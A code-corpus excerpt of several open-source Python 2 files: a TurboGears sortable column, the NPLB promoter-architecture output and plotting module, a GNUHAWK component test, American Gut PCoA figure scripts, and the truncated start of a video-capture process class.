repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated |
---|---|---|---|---|---|---|---|---|---|---|
eriknyk/devcon | devcon/lib/orderColumn.py | 1 | 1133 | from tg import expose, flash, require, url, request, redirect, validate, response
from sqlalchemy import asc, desc
from tw.forms.datagrid import Column
import genshi
class SortableColumn(Column):
def __init__(self, title, name):
super(SortableColumn, self).__init__(name)
self._title_ = title
def set_title(self, title):
self._title_ = title
def get_title(self):
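        # Builds a header link that toggles the sort direction: the 'ordercol'
        # GET parameter carries the column name prefixed with '+' (ascending)
        # or '-' (descending), and clicking the rendered link flips the prefix.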
current_ordering = request.GET.get('ordercol')
if current_ordering and current_ordering[1:] == self.name:
#current_ordering = '-' if current_ordering[0] == '+' else '+'
if current_ordering[0] == '+':
current_ordering = '-'
else:
current_ordering = '+'
else:
current_ordering = '+'
current_ordering += self.name
new_params = dict(request.GET)
new_params['ordercol'] = current_ordering
new_url = url(request.path_url, params=new_params)
return genshi.Markup('<a href="%(page_url)s">%(title)s</a>' % dict(page_url=new_url, title=self._title_))
title = property(get_title, set_title)
| lgpl-2.1 | -7,254,929,501,285,495,000 | 34.40625 | 113 | 0.595763 | false |
computationalBiology/NPLB | NPLB/savefiles.py | 1 | 14566 |
##################### NPLB #####################
# No Promoter Left Behind (NPLB) is a tool to
# find the different promoter architectures within a set of promoter
# sequences. More information can be found in the README file.
# Copyright (C) 2015 Sneha Mitra and Leelavati Narlikar
# NPLB is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# NPLB is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
################################################
import weblogoMod.weblogolib as wl
import plotExtras
import numpy
import os
import gc
import sys
import pickle
from config import *
import copy
def createLogo(sequences, filename, pos, features, eps): # Create logo using Weblogo 3.3
if sequences == []: return
seqs = wl.read_seq_data(sequences)
data = wl.LogoData.from_seqs(seqs)
options = wl.LogoOptions()
options.title = ""
options.size = "large"
options.color_scheme = wl.colorscheme.monochrome
options.stacks_per_line = 100
options.text_font = "Arial-BoldMT"
options.annotate = pos
formt = wl.LogoFormat(data, options)
fout = open(filename + ".png", "w")
wl.png_formatter(data, formt, fout)
fout.close()
if eps == 1:
fout = open(filename + ".eps", "w")
wl.eps_formatter(data, formt, fout)
fout.close()
def sampleOne(l, n, tu, pos, features): # Sample values based on model
arr = ['A', 'C', 'G']
arr = arr + ['T'] if tu == 0 else arr + ['U']
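    # Inverse-CDF sampling: cumsum() turns each position's base probabilities
    # into a CDF and searchsorted() maps a uniform random draw onto a base
    # index, e.g. probabilities [0.5, 0.3, 0.2] -> CDF [0.5, 0.8, 1.0], so a
    # draw of 0.65 falls in slot 1 and yields 'C'.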
l1 = map(list, zip(*map(lambda x: numpy.array(x).cumsum().searchsorted(numpy.random.sample(n)).tolist(), l)))
l1 = map(lambda x: "".join(map(lambda y: arr[y], l1[x])), range(n))
return l1
def makeImages(d, dirname, tu, tss, prefix, eps): # Create logo for each architecture of given model
lst = [map(lambda x: " ", range(1, d['features'] + 1)) for i in range(d['arch'])]
numpy.random.seed(5)
l = numpy.zeros(shape=(d['arch'], d['features'], d['featureValues']))
for i in range(d['arch']):
for j in range(d['features']):
for k in range(d['featureValues']):
l[i][j][k] = float(d['fvNoise'][j][k] + d['alpha'])/(d['fnoise'][j] + d['featureValues']*d['alpha'])
for j in d['pos'][i]:
for k in range(d['featureValues']):
l[i][j][k] = float(d['count'][i][j][k] + d['alpha'])/(d['t'][i] + d['featureValues']*d['alpha'])
lst[i][j] = "*"
lst[i][tss] = "+1"
if tss in d['pos'][i]: lst[i][tss] = "+1*"
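        # Annotate every 25th position relative to the TSS (negative numbers
        # upstream, positive downstream) so the logo axis reads as promoter
        # coordinates around the +1 site.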
diffN = 25
c = -diffN
c1 = tss - diffN
while c1 >= 0:
lst[i][c1] = str(c) + lst[i][c1]
c = c - diffN
c1 = c1 - diffN
c = diffN
c1 = tss + diffN - 1
while c1 < d['features']:
lst[i][c1] = str(c) + lst[i][c1]
c = c + diffN
c1 = c1 + diffN
l = map(lambda x: sampleOne(l[x], d['t'][x], tu, d['pos'][x], d['features']), range(d['arch']))
for i in range(d['arch']):
createLogo(l[i], dirname + "/" + prefix + str(i), lst[i], d['features'], eps)
def makehtml(dirname, d, l): # Create HTML file containing logos for best model learned by NPLB
f = open(dirname + modelOutHTML, "w")
f.write("<!DOCTYPE html>\n<html>\n<body>\n<h1>MODEL</h1>\n")
f.write("<h3>Lambda: " + str(d['lambda']) + "</h3>\n")
f.write("<h3>Dataset structure: " + str(d['n']) + " sequences with " + str(d['features']) + " features</h3>\n")
f.write("<h3>Number of architectures in the best model: " + str(d['arch']) + "</h3>\n")
f.write("<h3>Likelihood of best model: " + str(l) + "</h3>\n")
for i in range(d['arch']):
f.write("<h4>Architecture " + str(i+1) + ": " + str(d['t'][i]) + " sequences with " + str(d['posCount'][i]) + " important features</h4>\n")
if d['t'][i] == 0:
f.write("<h5>No Sequences</h5>\n")
else:
f.write("<h5>Sequence logo for the important positions in architecture " + str(i+1) + "</h5>\n")
f.write("<img src=\"" + htmlFiles + "/" + str(i) + ".png\" style=\"border:thin solid black\">\n")
f.write("<p><i>NOTE: All important positions in the logos are followed by an asterisk symbol and are coloured blue</i></p>")
f.write("</body>\n</html>\n")
f.close()
def makehtmlOrig(dirname, d, l, dO): # Create HTML file containing logos for best model learned by NPLB along with the logo of raw data
f = open(dirname + modelOutHTML, "w")
f.write("<!DOCTYPE html>\n<html>\n<body>\n<h1>MODEL</h1>\n")
f.write("<h3>Lambda: " + str(d['lambda']) + "</h3>\n")
f.write("<h3>Dataset structure: " + str(d['n']) + " sequences with " + str(d['features']) + " features</h3>\n")
f.write("<h3>Number of architectures in the best model: " + str(d['arch']) + "</h3>\n")
f.write("<h3>Likelihood of best model: " + str(l) + "</h3>\n")
for i in range(d['arch']):
f.write("<h4>Architecture " + str(i+1) + ": " + str(d['t'][i]) + " sequences with " + str(d['posCount'][i]) + " important features</h4>\n")
if d['t'][i] == 0:
f.write("<h5>No Sequences</h5>\n")
else:
f.write("<h5>Sequence logo for the important positions in architecture " + str(i+1) + "</h5>\n")
f.write("<img src=\"" + htmlFiles + "/" + str(i) + ".png\" style=\"border:thin solid black\">\n")
f.write("<h5>Logo for the raw data</h5>\n")
f.write("<img src=\"" + htmlFiles + "/" + rawDataImgPref + "0.png\" style=\"border:thin solid black\">\n")
f.write("<p><i>NOTE: All important positions in the logos are followed by an asterisk symbol and are coloured blue</i></p>")
f.write("</body>\n</html>\n")
f.close()
def maketxt(dirname, d): # Create text file containing details about the best model
f = open(dirname + modelOutTxt, "w")
f.write("MODEL\n\n")
f.write("Lambda: " + str(d['m']['lambda']) + "\n\n")
f.write("Dataset structure: " + str(d['m']['n']) + " sequences with " + str(d['m']['features']) + " features\n")
f.write("Number of architectures in the best model: " + str(d['m']['arch']) + "\n\n")
for i in range(d['m']['arch']):
f.write("Architecture " + str(i+1) + ": " + str(d['m']['t'][i]) + " sequences with " + str(d['m']['posCount'][i]) + " important features\n")
for j in range(d['m']['posCount'][i]):
f.write(str(d['m']['pos'][i][j]+1) + " (");
f.write(str(float(d['m']['count'][i][d['m']['pos'][i][j]][0] + d['m']['alpha'])/(d['m']['t'][i] + d['m']['featureValues']*d['m']['alpha'])) + " {" + str(d['m']['count'][i][d['m']['pos'][i][j]][0]) + "/" + str(d['m']['t'][i]) + "}")
for k in range(1, d['m']['featureValues']):
f.write(", " + str(float(d['m']['count'][i][d['m']['pos'][i][j]][k] + d['m']['alpha'])/(d['m']['t'][i] + d['m']['featureValues']*d['m']['alpha'])) + " {" + str(d['m']['count'][i][d['m']['pos'][i][j]][k]) + "/" + str(d['m']['t'][i]) + "}")
f.write(")\n")
f.write("\n")
f.close()
f = open(dirname + tempLabelsModelFile, "w")
for i in d['lp']: f.write(str(i) + "\n")
f.close()
os.system("paste" + " " + dirname + tempLabelsModelFile + " " + dirname + tempLabelsFile + " " + ">" + " " + dirname + clusterDetailsFile)
os.system("rm" + " " + dirname + tempLabelsModelFile + " " + dirname + tempLabelsFile)
def makeImage(dirname, model, rfile, tss, imgfile, imgfileeps, inpfile): # Create image matrix of input model
os.system("cut" + " " + "-f1" + " " + dirname + inpfile + " " + ">" + " " + dirname + hiddenLabels)
os.system("rev" + " " + dirname + inpfile + " " + "|" + " " + "cut" + " " + "-f1" + " | rev " + ">" + " " + dirname + hiddenOldData)
indices = [[] for i in range(model['arch'])]
j = 0
with open(dirname + hiddenLabels) as infile:
for line in infile:
tmp = int(line)
indices[model['arch'] - tmp] = indices[model['arch'] - tmp] + [j]
j = j + 1
f = open(dirname + hiddenData, "w")
for i in indices:
j = 0
k = 0
with open(dirname + hiddenOldData) as infile:
for line in infile:
try:
if k == i[j]:
f.write(line)
j = j + 1
k = k + 1
except: pass
f.close()
if sys.platform == "darwin":
os.system("sed" + " " + "-i" + " '' " + "'s/A/0\t/g;s/a/0\t/g;s/C/1\t/g;s/c/1\t/g;s/G/2\t/g;s/g/2\t/g;s/T/3\t/g;s/t/3\t/g;'" + " " + dirname + hiddenData) # Modify input Fasta file to replace A, C, G, and T with 0, 1, 2 and 3 respectively on OS X.
else:
os.system("sed" + " " + "-i" + " " + "'s/A/0\t/g;s/a/0\t/g;s/C/1\t/g;s/c/1\t/g;s/G/2\t/g;s/g/2\t/g;s/T/3\t/g;s/t/3\t/g;'" + " " + dirname + hiddenData) # Modify input Fasta file to replace A, C, G, and T with 0, 1, 2 and 3 respectively on Linux.
f = open(dirname + hiddenDrawLines, "w") # Save lines to be drawn on image matrix
# Save labels for both axes of image matrix
f1 = open(dirname + hiddenDrawLabels1, "w")
c = 0
for i in (model['t'][::-1])[:-1]:
c = c + i
f.write("-0.5\t" + str(c) + "\n" + str(model['features']-0.5) + "\t" + str(c) + "\n\n")
f1.write(str(c) + "\n")
f.close()
f1.close()
f = open(dirname + hiddenDrawLabels2, "w")
c = 0
for i in reversed(range(model['arch'])):
f.write("A" + str(i + 1) + "\t" + str((c + c + model['t'][i])/2) + "\n\n")
c = c + model['t'][i]
f.close()
lst = []
gap = max(int(round(imgMatrixNumGap*model['features'])), 1)
c = -gap
c1 = tss - gap
while c1 >= 0:
lst = [(str(c1), str(c))] + lst
c = c - gap
c1 = c1 - gap
lst = lst + [(str(tss), "+1")]
c = gap
c1 = tss + gap - 1
while c1 < model['features']:
lst = lst + [(str(c1), "+" + str(c))]
c = c + gap
c1 = c1 + gap
f = open(dirname + hiddenDrawXTics, "w")
for (i1, i2) in lst:
f.write(i1 + "\t" + i2 + "\n")
f.close()
os.system("gnuplot" + " " + "-e" + " " + "'filename=\"" + dirname + hiddenData + "\"; var=\"" + dirname + imgfile + "\"; var1=\"" + dirname + hiddenDrawLines + "\"; var2=\"" + dirname + hiddenDrawLabels1 + "\"; var3=\"" + dirname + hiddenDrawLabels2 + "\"; var4=\"" + dirname + hiddenDrawXTics + "\"'" + " " + rfile[0] + " 2> /dev/null")
if imgfileeps != "": os.system("gnuplot" + " " + "-e" + " " + "'filename=\"" + dirname + hiddenData + "\"; var=\"" + dirname + imgfileeps + "\"; var1=\"" + dirname + hiddenDrawLines + "\"; var2=\"" + dirname + hiddenDrawLabels1 + "\"; var3=\"" + dirname + hiddenDrawLabels2 + "\"; var4=\"" + dirname + hiddenDrawXTics + "\"'" + " " + rfile[1] + " 2> /dev/null")
os.system("rm" + " " + "-f" + " " + dirname + "/.??*")
def savecvls(dirname, cvals): # Save cross validation likelihood of the models learned
if cvals == []: return
maxArch = len(cvals)
f = open(dirname + cvLikelihoods, "w")
f.write("Cross validation likelihood of the best models\n\n")
for i in range(maxArch):
f.write(str(cvals[i][0]) + " architectures: ")
if cvals[i][1] == 0: f.write("Not calculated\n")
else: f.write(str(cvals[i][1]) + "\n")
f.close()
def saveDetails(d, dirname, rfile, cvals, tss, flag, pEx, pCol, sBy, eps):
dirname = dirname + "/"
tmp_d_m_pos = d['m']['pos'][0]
if ((tmp_d_m_pos[0] == 0 or tmp_d_m_pos[0] == 1) and (tmp_d_m_pos[1] == 0 or tmp_d_m_pos[1] == 1) and (tmp_d_m_pos[2] == 0 or tmp_d_m_pos[2] == 1)):
for i in range(d['m']['arch']):
d['m']['pos'][i] = filter(lambda x: d['m']['pos'][i][x] == 1, range(d['m']['features']))
if flag == 0: pickle.dump(d['m'], open(dirname + bestModelFile, "wb"))
os.system("rm" + " " + "-rf" + " " + dirname + htmlFiles)
try:
os.mkdir(dirname + htmlFiles)
except OSError:
print "ERROR: Cannot create directory", dirname + htmlFiles
exit(2)
if pEx != '':
if pEx[0] != '' and pCol != 0 and sBy != 0 and flag == 0:
cv = plotExtras.checkValid(pEx[0], sBy, d['m']['n'])
if cv == -1 or cv == 2:
print "Could not sort by values in column", sBy
print "Please check -plotExtra file and/or -sortBy column number"
else:
d = plotExtras.rearrange(d, pEx, sBy)
savecvls(dirname, cvals)
makeImages(d['m'], dirname + htmlFiles, 0, tss, "", eps)
if flag != 0: makehtml(dirname, d['m'], d['l'])
if flag == 0:
# Save information about the raw data
dOrig = {}
dOrig['features'] = d['m']['features']
dOrig['arch'] = 1
dOrig['featureValues'] = d['m']['featureValues']
dOrig['fvNoise'] = map(lambda z: map(lambda y: sum(map(lambda x: d['m']['count'][x][z][y], range(d['m']['arch']))), range(d['m']['featureValues'])), range(d['m']['features']))
dOrig['pos'] = [[]]
dOrig['alpha'] = d['m']['alpha']
dOrig['fnoise'] = [d['m']['n'] for i in range(d['m']['features'])]
dOrig['t'] = [d['m']['n']]
makeImages(dOrig, dirname + htmlFiles, 0, tss, rawDataImgPref, eps)
makehtmlOrig(dirname, d['m'], d['l'], dOrig)
if rfile != 0:
os.system("sed -e 's/^/1\t/' " + dirname + tempLabelsFile + " > " + dirname + rawClusterDetailsFile)
if eps == 0: makeImage(dirname, dOrig, rfile, tss, rawDataImage, "", rawClusterDetailsFile)
else: makeImage(dirname, dOrig, rfile, tss, rawDataImage, rawDataImageEPS, rawClusterDetailsFile)
maketxt(dirname, d)
if rfile != 0 and flag == 0:
if eps == 0: makeImage(dirname, d['m'], rfile, tss, imageMatrix, "", clusterDetailsFile)
else: makeImage(dirname, d['m'], rfile, tss, imageMatrix, imageMatrixEPS, clusterDetailsFile)
if pEx != '':
if pEx[0] != '' and pCol != 0 and flag == 0: plotExtras.plotExt(d, pEx, pCol, dirname)
collected = gc.collect()
| gpl-3.0 | -7,730,404,251,325,200,000 | 48.883562 | 365 | 0.532885 | false |
RedhawkSDR/integration-gnuhawk | components/deinterleave_bb_4o/tests/test_deinterleave_bb_4o.py | 1 | 4079 | #!/usr/bin/env python
#
# This file is protected by Copyright. Please refer to the COPYRIGHT file
# distributed with this source distribution.
#
# This file is part of GNUHAWK.
#
# GNUHAWK is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# GNUHAWK is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see http://www.gnu.org/licenses/.
#
import unittest
import ossie.utils.testing
import os
from omniORB import any
class ComponentTests(ossie.utils.testing.ScaComponentTestCase):
"""Test for all component implementations in deinterleave_bb_4o"""
def testScaBasicBehavior(self):
#######################################################################
# Launch the component with the default execparams
execparams = self.getPropertySet(kinds=("execparam",), modes=("readwrite", "writeonly"), includeNil=False)
execparams = dict([(x.id, any.from_any(x.value)) for x in execparams])
self.launch(execparams)
#######################################################################
# Verify the basic state of the component
self.assertNotEqual(self.comp, None)
self.assertEqual(self.comp.ref._non_existent(), False)
self.assertEqual(self.comp.ref._is_a("IDL:CF/Resource:1.0"), True)
#######################################################################
# Validate that query returns all expected parameters
# Query of '[]' should return the following set of properties
expectedProps = []
expectedProps.extend(self.getPropertySet(kinds=("configure", "execparam"), modes=("readwrite", "readonly"), includeNil=True))
expectedProps.extend(self.getPropertySet(kinds=("allocate",), action="external", includeNil=True))
props = self.comp.query([])
props = dict((x.id, any.from_any(x.value)) for x in props)
# Query may return more than expected, but not less
for expectedProp in expectedProps:
self.assertEquals(props.has_key(expectedProp.id), True)
#######################################################################
# Verify that all expected ports are available
for port in self.scd.get_componentfeatures().get_ports().get_uses():
port_obj = self.comp.getPort(str(port.get_usesname()))
self.assertNotEqual(port_obj, None)
self.assertEqual(port_obj._non_existent(), False)
self.assertEqual(port_obj._is_a("IDL:CF/Port:1.0"), True)
for port in self.scd.get_componentfeatures().get_ports().get_provides():
port_obj = self.comp.getPort(str(port.get_providesname()))
self.assertNotEqual(port_obj, None)
self.assertEqual(port_obj._non_existent(), False)
self.assertEqual(port_obj._is_a(port.get_repid()), True)
#######################################################################
# Make sure start and stop can be called without throwing exceptions
self.comp.start()
self.comp.stop()
#######################################################################
# Simulate regular component shutdown
self.comp.releaseObject()
# TODO Add additional tests here
#
# See:
# ossie.utils.bulkio.bulkio_helpers,
# ossie.utils.bluefile.bluefile_helpers
# for modules that will assist with testing components with BULKIO ports
if __name__ == "__main__":
ossie.utils.testing.main("../deinterleave_bb_4o.spd.xml") # By default tests all implementations
| gpl-3.0 | 8,618,088,849,222,091,000 | 46.988235 | 133 | 0.593038 | false |
mortonjt/American-Gut | scripts/mod2_pcoa.py | 1 | 14487 | #!/usr/bin/env python
import os
import click
from matplotlib import use
use('Agg') # noqa
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from skbio import read, DistanceMatrix
from skbio.stats import isubsample
from skbio.stats.ordination import OrdinationResults
from collections import defaultdict
from collections import OrderedDict
ALPHA = 1.0
LINE_WIDTH = 0.3
LINE_WIDTH_WHITE = 2.0
LINE_WIDTH_BLACK = 1.0
@click.group()
def mod2_pcoa():
pass
@mod2_pcoa.command()
@click.option('--coords', required=True, type=click.Path(
resolve_path=True, readable=True, exists=True),
help='Coordinates file')
@click.option('--mapping_file', required=True, type=click.Path(
resolve_path=True, readable=True, exists=True),
help='Mapping file')
@click.option('--output', required=True, type=click.Path(exists=True,
writable=True, resolve_path=True), help='Output directory')
@click.option('--prefix', required=True, type=str, help='Output file prefix')
@click.option('--samples', required=False, type=str,
help='Comma separated list of samples to print')
def body_site(coords, mapping_file, output, prefix, samples):
"""Generates as many figures as samples in the coordinates file"""
o = read(coords, into=OrdinationResults)
# coordinates
c_df = pd.DataFrame(o.site, o.site_ids)
# mapping file
mf = pd.read_csv(mapping_file, '\t', converters=defaultdict(str),
index_col='#SampleID')
mf = mf.loc[o.site_ids]
if samples is None:
samples = mf.index
else:
samples = set(samples.split(',')).intersection(set(o.site_ids))
samples = mf.loc[samples].index
color_hmp_fecal = sns.color_palette('Paired', 12)[10] # light brown
color_agp_fecal = sns.color_palette('Paired', 12)[11] # dark brown
color_hmp_oral = sns.color_palette('Paired', 12)[0] # light blue
color_agp_oral = sns.color_palette('Paired', 12)[1] # dark blue
color_hmp_skin = sns.color_palette('Paired', 12)[2] # light green
color_agp_skin = sns.color_palette('Paired', 12)[3] # dark green
grp_colors = {'AGP-FECAL': color_agp_fecal,
'AGP-ORAL': color_agp_oral,
'AGP-SKIN': color_agp_skin,
'HMP-FECAL': color_hmp_fecal,
'GG-FECAL': color_hmp_fecal,
'PGP-FECAL': color_hmp_fecal,
'HMP-ORAL': color_hmp_oral,
'PGP-ORAL': color_hmp_oral,
'HMP-SKIN': color_hmp_skin,
'PGP-SKIN': color_hmp_skin}
for sample in samples:
# plot categories as 50 slices with random zorder
for grp, color in grp_colors.iteritems():
sub_coords = c_df[mf.TITLE_BODY_SITE == grp].values
for i in np.array_split(sub_coords, 50):
plt.scatter(i[:, 0], i[:, 1], color=color,
edgecolor=np.asarray(color)*0.6, lw=LINE_WIDTH,
alpha=ALPHA, zorder=np.random.rand())
# plot participant's dot
plt.scatter(c_df.loc[sample][0], c_df.loc[sample][1],
color=grp_colors[mf.loc[sample]['TITLE_BODY_SITE']],
s=270, edgecolor='w', zorder=1, lw=LINE_WIDTH_WHITE)
plt.scatter(c_df.loc[sample][0], c_df.loc[sample][1],
color=grp_colors[mf.loc[sample]['TITLE_BODY_SITE']],
s=250, edgecolor=np.asarray(
grp_colors[mf.loc[sample]['TITLE_BODY_SITE']])*0.6,
zorder=2, lw=LINE_WIDTH_BLACK)
plt.axis('off')
my_dpi = 72
figsize = (1000 / my_dpi, 1000 / my_dpi)
out_file = os.path.join(output, '.'.join([prefix, sample, 'pdf']))
plt.savefig(out_file, figsize=figsize, dpi=my_dpi)
plt.close()
@mod2_pcoa.command()
@click.option('--distmat', required=True, type=click.Path(resolve_path=True,
readable=True,
exists=True),
help='Input distance matrix to subsample nearest sample')
@click.option('--mapping_file', required=True, type=click.Path(
resolve_path=True, readable=True, exists=True),
help='Mapping file')
@click.option('--max', required=True, type=int,
help='Max number of samples per category value')
@click.option('--category', required=True, type=str,
help='The category to subsample in (likely COUNTRY)')
@click.option('--output', required=True, type=click.Path(exists=False,
writable=True, resolve_path=True), help='Output file')
def subsample_dm(distmat, mapping_file, max, category, output):
"""Subsample the distmat to max samples per category value"""
mf = pd.read_csv(mapping_file, '\t', converters=defaultdict(str),
index_col='#SampleID')
id_to_cat = dict(mf[category])
def bin_f(x):
return id_to_cat[x]
dm = read(distmat, into=DistanceMatrix)
dm = dm.filter([id for _, id in isubsample(dm.ids, max, bin_f=bin_f)])
dm.to_file(output)
@mod2_pcoa.command()
@click.option('--coords', required=True, type=click.Path(resolve_path=True,
readable=True, exists=True), help='Coordinates file')
@click.option('--mapping_file', required=True, type=click.Path(
resolve_path=True, readable=True, exists=True),
help='Mapping file')
@click.option('--output', required=True, type=click.Path(exists=True,
writable=True, resolve_path=True), help='Output directory')
@click.option('--prefix', required=True, type=str, help='Output file prefix')
@click.option('--samples', required=False, type=str,
help='Comma separated list of samples to print')
@click.option('--distmat', required=True, type=click.Path(resolve_path=True,
readable=True,
exists=True),
help=('Input distance matrix to find nearest sample (if not '
'present in the coordinates'))
def country(coords, mapping_file, output, prefix, samples, distmat):
"""Generates as many figures as samples in the coordinates file"""
o = read(coords, into=OrdinationResults)
o_id_lookup = set(o.site_ids)
dm = read(distmat, into=DistanceMatrix)
dm_id_lookup = {i: idx for idx, i in enumerate(dm.ids)}
coord_samples_in_dm = {idx for idx, i in enumerate(dm.ids)
if i in o_id_lookup}
# we'll be computing min values, so we need to avoid catching the diagonal
np.fill_diagonal(dm._data, np.inf)
x, y = o.site[:, 0], o.site[:, 1]
# coordinates
c_df = pd.DataFrame(o.site, o.site_ids)
# mapping file
mf = pd.read_csv(mapping_file, '\t', converters=defaultdict(str),
index_col='#SampleID')
# mf = mf.loc[o.site_ids]
if samples is None:
samples = dm.ids[:]
else:
samples = set(samples.split(',')).intersection(set(dm.ids))
samples = mf.loc[samples].index
color_Venezuela = sns.color_palette('Paired', 12)[10]
color_Malawi = sns.color_palette('Paired', 12)[1]
color_Western = sns.color_palette('Paired', 12)[4]
color_Highlight = sns.color_palette('Paired', 12)[5]
color_no_data = (0.5, 0.5, 0.5)
grp_colors = OrderedDict()
grp_colors['no_data'] = color_no_data
grp_colors['Australia'] = color_Western
grp_colors['Belgium'] = color_Western
grp_colors['Canada'] = color_Western
grp_colors['China'] = color_Western
grp_colors['Finland'] = color_Western
grp_colors['France'] = color_Western
grp_colors['Germany'] = color_Western
grp_colors['Great Britain'] = color_Western
grp_colors['Ireland'] = color_Western
grp_colors['Japan'] = color_Western
grp_colors['Netherlands'] = color_Western
grp_colors['New Zealand'] = color_Western
grp_colors['Norway'] = color_Western
grp_colors['Scotland'] = color_Western
grp_colors['Spain'] = color_Western
grp_colors['Switzerland'] = color_Western
grp_colors['Thailand'] = color_Western
grp_colors['United Arab Emirates'] = color_Western
grp_colors['United Kingdom'] = color_Western
grp_colors['United States of America'] = color_Western
grp_colors['Malawi'] = color_Malawi
grp_colors['Venezuela'] = color_Venezuela
for sample_to_plot in samples:
if sample_to_plot in o_id_lookup:
sample = sample_to_plot
else:
# find the closest sample in the distance matrix that is in the
# coordinates data
sample = None
for i in dm[dm_id_lookup[sample_to_plot]].argsort():
if i in coord_samples_in_dm:
sample = dm.ids[i]
break
# this should not ever happen
if sample is None:
raise ValueError("Unable to find a similar sample?")
        # contour plot superimposed
sns.kdeplot(x, y, cmap='bone')
sns.set_context(rc={"lines.linewidth": 0.75})
        # change participant's country's color to color_Highlight unless
# country is Venezuela or Malawi
if (mf.loc[sample_to_plot]['COUNTRY'] != 'Malawi') & (
mf.loc[sample_to_plot]['COUNTRY'] != 'Venezuela'):
grp_colors[mf.loc[sample_to_plot]['COUNTRY']] = color_Highlight
# plot each country except participant's according to colors above
for grp, color in grp_colors.iteritems():
if grp == mf.loc[sample_to_plot]['COUNTRY']:
continue
sub_coords = c_df[mf.COUNTRY == grp]
plt.scatter(sub_coords[0], sub_coords[1], color=color,
edgecolor=np.asarray(color)*0.6, lw=LINE_WIDTH,
alpha=ALPHA)
# now plot participant's country
grp = mf.loc[sample_to_plot]['COUNTRY']
color = grp_colors[grp]
sub_coords = c_df[mf.COUNTRY == grp]
plt.scatter(sub_coords[0], sub_coords[1], color=color,
edgecolor=np.asarray(color)*0.6, lw=LINE_WIDTH,
alpha=ALPHA)
# plot participant's dot
plt.scatter(c_df.loc[sample][0], c_df.loc[sample][1],
color=grp_colors[mf.loc[sample_to_plot]['COUNTRY']],
s=270, edgecolor='w', zorder=1, lw=LINE_WIDTH_WHITE)
plt.scatter(c_df.loc[sample][0], c_df.loc[sample][1],
color=grp_colors[mf.loc[sample_to_plot]['COUNTRY']],
s=250, edgecolor=np.asarray(grp_colors[
mf.loc[sample_to_plot]['COUNTRY']])*0.6,
zorder=2, lw=LINE_WIDTH_BLACK)
        # reset participant's country's color to color_Western unless country
# is Venezuela or Malawi
if (mf.loc[sample_to_plot]['COUNTRY'] != 'Malawi') & (
mf.loc[sample_to_plot]['COUNTRY'] != 'Venezuela'):
grp_colors[mf.loc[sample_to_plot]['COUNTRY']] = color_Western
plt.axis('off')
my_dpi = 72
figsize = (1000 / my_dpi, 1000 / my_dpi)
out_file = os.path.join(output, '.'.join([prefix, sample, 'pdf']))
plt.savefig(out_file, figsize=figsize, dpi=my_dpi)
plt.close()
@mod2_pcoa.command()
@click.option('--coords', required=True, type=click.Path(resolve_path=True,
readable=True, exists=True), help='Coordinates file')
@click.option('--mapping_file', required=True, type=click.Path(
resolve_path=True, readable=True, exists=True),
help='Mapping file')
@click.option('--color', required=True, type=str,
help='Metadata category to set color by')
@click.option('--output', required=True, type=click.Path(exists=True,
writable=True, resolve_path=True), help='Output directory')
@click.option('--prefix', required=True, type=str, help='Output file prefix')
@click.option('--samples', required=False, type=str,
help='Comma separated list of samples to print')
def gradient(coords, mapping_file, color, output, prefix, samples):
"""Generates as many figures as samples in the coordinates file"""
o = read(coords, into=OrdinationResults)
# coordinates
c_df = pd.DataFrame(o.site, o.site_ids)
# mapping file
mf = pd.read_csv(mapping_file, '\t', converters=defaultdict(str),
index_col='#SampleID')
mf = mf.loc[o.site_ids]
mf[color] = mf[color].convert_objects(convert_numeric=True)
if samples is None:
samples = mf.index
else:
samples = set(samples.split(',')).intersection(set(o.site_ids))
samples = mf.loc[samples].index
numeric = mf[~pd.isnull(mf[color])]
non_numeric = mf[pd.isnull(mf[color])]
color_array = plt.cm.RdBu(numeric[color]/max(numeric[color]))
for sample in samples:
# plot numeric metadata as colored gradient
ids = numeric.index
x, y = c_df.loc[ids][0], c_df.loc[ids][1]
plt.scatter(x, y, c=numeric[color], cmap=plt.get_cmap('RdBu'),
alpha=ALPHA, lw=LINE_WIDTH, edgecolor=color_array*0.6)
# plt.colorbar()
# plot non-numeric metadata as gray
ids = non_numeric.index
x, y = c_df.loc[ids][0], c_df.loc[ids][1]
plt.scatter(x, y, c='0.5', alpha=ALPHA, lw=LINE_WIDTH, edgecolor='0.3')
# plot individual's dot
try:
color_index = numeric.index.tolist().index(sample)
except ValueError:
color_index = None
if color_index is None:
_color = (0.5, 0.5, 0.5)
else:
_color = color_array[color_index]
plt.scatter(c_df.loc[sample][0], c_df.loc[sample][1],
color=_color, s=270, edgecolor='w', lw=LINE_WIDTH_WHITE)
plt.scatter(c_df.loc[sample][0], c_df.loc[sample][1],
color=_color, s=250, edgecolor=np.asarray(_color)*0.6,
lw=LINE_WIDTH_BLACK)
plt.axis('off')
my_dpi = 72
figsize = (1000 / my_dpi, 1000 / my_dpi)
out_file = os.path.join(output, '.'.join([prefix, sample, 'pdf']))
plt.savefig(out_file, figsize=figsize, dpi=my_dpi)
plt.close()
if __name__ == '__main__':
mod2_pcoa()
| bsd-3-clause | -6,790,581,772,316,809,000 | 40.03966 | 79 | 0.58908 | false |
Skydes/Monitoring | src/capture.py | 1 | 4332 | #!/usr/bin/env python
'''
Copyright (c) 2016, Paul-Edouard Sarlin
All rights reserved.
Project: Autonomous Monitoring System
File: capture.py
Date: 2016-08-08
Author: Paul-Edouard Sarlin
Website: https://github.com/skydes/monitoring
'''
from multiprocessing import Process, Event, Lock, Queue
from Queue import Full
from time import sleep
import v4l2capture
import select
import cv2
import os
import logging
import numpy as np
FAIL = False
class Capture(Process):
def __init__(self, out_queue, conf, conf_lock):
Process.__init__(self)
self._out_queue = out_queue
self._stop = Event()
self._stop.set()
self._new_conf = Event()
self._new_conf.clear()
self._conf_lock = conf_lock
self._conf = conf
self._stream = None
